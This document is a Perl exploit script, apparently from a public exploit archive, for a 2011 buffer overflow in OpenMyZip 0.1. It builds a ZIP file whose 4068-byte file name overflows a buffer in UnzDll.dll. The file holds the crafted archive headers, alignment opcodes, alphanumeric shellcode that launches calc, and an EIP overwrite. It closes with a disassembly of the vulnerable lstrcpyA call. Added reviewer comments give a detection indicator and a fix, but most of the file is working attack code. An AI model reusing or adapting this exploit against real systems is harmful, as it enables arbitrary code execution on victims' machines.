source: https://www.securityfocus.com/bid/47678/info OpenMyZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. OpenMyZip 0.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#
#
#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
#[+]Date: 02\05\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html
#[+]Version: v0.1
#[+]Tested On: WIN-XP SP3 Brazil Portuguese
#[+]CVE: N/A
#
#
#
# Review notes (what this script emits, from a defender's point of view):
# - It writes a hand-built ZIP archive: a 30-byte local file header ($head,
#   "PK\x03\x04") and a 46-byte central directory entry ($head2, "PK\x01\x02"),
#   each followed by the same 4068-byte file name, then a 22-byte
#   end-of-central-directory record ($head3, "PK\x05\x06").
# - The name-length field in both headers is "\xe4\x0f" (0x0FE4 = 4068),
#   which is 4064 bytes of $payload plus ".txt"; the sizes in $head3
#   (0x1012 = 46 + 4068, 0x1002 = 30 + 4068) agree with that.  A 4 KiB file
#   name is far beyond what ordinary archivers produce, so an oversized
#   name-length field is a usable indicator when scanning archives.
# - Per the POD at the bottom, the product-side defect is an unbounded
#   lstrcpyA of that name inside UnzDll.dll; the fix there is a bounded copy
#   or rejecting name-length values larger than the destination buffer.
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
print "\n\n[+] Creting ZIP File...\n";
sleep(1);
# Local file header ("PK\x03\x04", 30 bytes); "\xe4\x0f" is the file-name
# length field (0x0FE4 = 4068, little-endian).
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
# Central directory entry ("PK\x01\x02", 46 bytes); same 4068 name length.
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
# End-of-central-directory record ("PK\x05\x06", 22 bytes): one entry,
# directory size 0x1012 (46 + 4068), directory offset 0x1002 (30 + 4068).
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
my $payload = "\x41" x 8;
$payload = $payload.
("\x61" x 7).#6 POPAD
("\x6A\x30").#PUSH 30
("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX
("\x41" x 10).#10 INC EAX
("\x02\xd3").#ADD CL,BL
("\x51\x58").#PUSH ECX / POP EAX
("\x98\xd1"); #BASE CONVERSION
#"\x98" == "\xff"
# "\xd1" == "\xd0"
#"\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}
$payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE
$payload .= "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".
"TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".
"5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX
"T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".
"9K7OGT86OPYJ03K9GEU3OKXSKYZA";
$payload .= "\x44" x (2050-length($payload));
$payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098
"\x41" x 5;# PADDING FOR OVERWRITE EIP
$payload .= pack('V',0x00404042);#JMP EBX
$payload .= "\x42" x 50;
$payload .= "\x41" x (4064-length($payload));
# 4064 bytes plus ".txt" = 4068, matching the "\xe4\x0f" length fields above.
$payload = $payload.".txt";
my $zip = $head.$payload.$head2.$payload.$head3;
# NOTE(review): bareword filehandle and 2-arg open.  $filename is the fixed
# literal "Exploit.zip", so there is no mode-injection risk here, but the
# safe idiom is: open(my $fh, '>', $filename) or die "...".
# No binmode() either: on Windows this handle is in text mode, which only
# rewrites 0x0A bytes, and none of the byte strings above contains one.
open(FILE,">$filename") || die "[-]Error:\n$!\n";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:)\n";
sleep(2);
# NOTE(review): "=head" carries no level (=head1 is the valid POD command);
# perl still treats a line starting with "=" plus an identifier as POD and
# skips everything up to "=cut", so the listing below is never executed.
=head
#
#The Vulnerable Function:
#
#
#The Vulnerable function is in MODULE UnzDll.dll on
#Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA
#ocorrs the Buffer Overflow on movimentation of the String Very large.
#
#Assemble:
#
#0x00DA6A6F  53                PUSH EBX
#0x00DA6A70  56                PUSH ESI
#0x00DA6A71  8B75 08           MOV ESI,DWORD PTR SS:[EBP+8]
#0x00DA6A74  8B55 18           MOV EDX,DWORD PTR SS:[EBP+18]
#0x00DA6A77  8B45 10           MOV EAX,DWORD PTR SS:[EBP+10]
#0x00DA6A7A  83BE 8CD20000 00  CMP DWORD PTR DS:[ESI+D28C],0
#0x00DA6A81  8D9E 50D80000     LEA EBX,DWORD PTR DS:[ESI+D850]
#0x00DA6A87  74 65             JE SHORT UnzDll.00DA6AEE
#0x00DA6A89  8B8E 84D20000     MOV ECX,DWORD PTR DS:[ESI+D284]
#0x00DA6A8F  890B              MOV DWORD PTR DS:[EBX],ECX
#0x00DA6A91  8B8E 88D20000     MOV ECX,DWORD PTR DS:[ESI+D288]
#0x00DA6A97  894B 04           MOV DWORD PTR DS:[EBX+4],ECX
#0x00DA6A9A  33C9              XOR ECX,ECX
#0x00DA6A9C  C743 08 A0000000  MOV DWORD PTR DS:[EBX+8],0A0
#0x00DA6AA3  894B 0C           MOV DWORD PTR DS:[EBX+C],ECX
#0x00DA6AA6  8B4D 0C           MOV ECX,DWORD PTR SS:[EBP+C]
#0x00DA6AA9  894B 10           MOV DWORD PTR DS:[EBX+10],ECX
#0x00DA6AAC  81BE 88DB0000 91> CMP DWORD PTR DS:[ESI+DB88],91
#0x00DA6AB6  7F 0A             JG SHORT UnzDll.00DA6AC2
#0x00DA6AB8  8BC8              MOV ECX,EAX
#0x00DA6ABA  80E1 FF           AND CL,0FF
#0x00DA6ABD  0FBEC9            MOVSX ECX,CL
#0x00DA6AC0  EB 02             JMP SHORT UnzDll.00DA6AC4
#0x00DA6AC2  8BC8              MOV ECX,EAX
#0x00DA6AC4  894B 14           MOV DWORD PTR DS:[EBX+14],ECX
#0x00DA6AC7  85D2              TEST EDX,EDX
#0x00DA6AC9  8B45 14           MOV EAX,DWORD PTR SS:[EBP+14]
#0x00DA6ACC  8943 18           MOV DWORD PTR DS:[EBX+18],EAX
#0x00DA6ACF  75 06             JNZ SHORT UnzDll.00DA6AD7
#0x00DA6AD1  C643 1C 00        MOV BYTE PTR DS:[EBX+1C],0
#0x00DA6AD5  EB 0A             JMP SHORT UnzDll.00DA6AE1
#0x00DA6AD7  52                PUSH EDX
#0x00DA6AD8  8D53 1C           LEA EDX,DWORD PTR DS:[EBX+1C]
#0x00DA6ADB  52                PUSH EDX
#0x00DA6ADC  E8 ABF20000       CALL UnzDll.00DB5D8C ; JMP to kernel32.lstrcpyA
#0x00DA6AE1  53                PUSH EBX
#0x00DA6AE2  FF96 8CD20000     CALL DWORD PTR DS:[ESI+D28C] ; Here ocorrs the Code Execution:-)
#0x00DA6AE8  0986 70D20000     OR DWORD PTR DS:[ESI+D270],EAX
#0x00DA6AEE  5E                POP ESI
#0x00DA6AEF  5B                POP EBX
#0x00DA6AF0  5D                POP EBP
#0x00DA6AF1  C3                RETN
#
#
#
#
#
=cut